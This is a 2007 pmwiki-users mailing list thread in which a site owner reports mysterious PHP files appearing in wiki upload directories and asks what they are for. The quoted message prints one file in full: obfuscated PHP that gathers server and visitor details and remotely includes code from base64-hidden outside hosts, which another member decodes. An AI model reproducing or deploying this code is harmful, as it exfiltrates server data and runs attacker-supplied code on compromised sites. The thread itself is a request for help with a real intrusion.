[pmwiki-users] FW: Mysterious php file appears in upload directory

Dr Fred C drfredc at verizon.net
Sat Apr 28 16:04:12 CDT 2007


So what's the purpose of this?  Anyway to prevent them from reappearing 
after deletion?

Peter K.H. Gragert wrote:
> The bas64 strings mean:
> http://www3.rssnews.ws
> http://www3.xmldata.info
> All the SEVER-info of .. are given to: ... these http addresses ...(base 64
> encoded)
> PKHG
>
>   
>> -----Oorspronkelijk bericht-----
>> Van: pmwiki-users-bounces at pmichaud.com [mailto:pmwiki-users-
>> bounces at pmichaud.com] Namens Dr Fred C
>> Verzonden: zaterdag 28 april 2007 18:35
>> Aan: PmWiki Users
>> Onderwerp: [pmwiki-users] Mysterious php file appears in upload directory
>>
>> I went to upload a file to one of my wikis this morning and, while that
>> went fine, I noticed a curious 43248.php file that had been uploaded to
>> this upload directory, last night around 2:30 am.   I checked with my
>> FTP program and quite a number of my various wikis had a similar php
>> file in the uploads directorys, and in the wiki.d directory -- always
>> with a different # for the file name, always of the same size.
>>
>> I downloaded it and it contained this info.
>>
>> <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ?
>> $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ?
>> $_SERVER["SERVER_NAME"] :
>> $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ?
>> $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])
>> ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])
>> ? $_SERVER["QUERY_STRING"] :
>> $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ?
>> $_SERVER["HTTP_REFERER"] :
>> $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ?
>> $_SERVER["HTTP_USER_AGENT"] :
>> $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ?
>> $_SERVER["REMOTE_ADDR"] :
>> $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ?
>> $_SERVER["SCRIPT_FILENAME"] :
>> $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ?
>> $_SERVER["HTTP_ACCEPT_LANGUAGE"] :
>> $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".ba
>> se64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_enc
>> ode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($
>> i).".".base64_encode($j);
>> if
>> ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLnd
>> z")."/?".$str))){}
>> else
>> {include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmlu
>> Zm8=")."/?".$str);}
>> ?>
>>
>> --------
>> Any ideas on what is going on here?
>>
>> --
>>
>> Always, Dr Fred C
>> drfredc at drfredc.com
>>
>>
>> _______________________________________________
>> pmwiki-users mailing list
>> pmwiki-users at pmichaud.com
>> http://www.pmichaud.com/mailman/listinfo/pmwiki-users
>>     
>
>
> _______________________________________________
> pmwiki-users mailing list
> pmwiki-users at pmichaud.com
> http://www.pmichaud.com/mailman/listinfo/pmwiki-users
>
>
>   

-- 

Always, Dr Fred C
drfredc at drfredc.com




More information about the pmwiki-users mailing list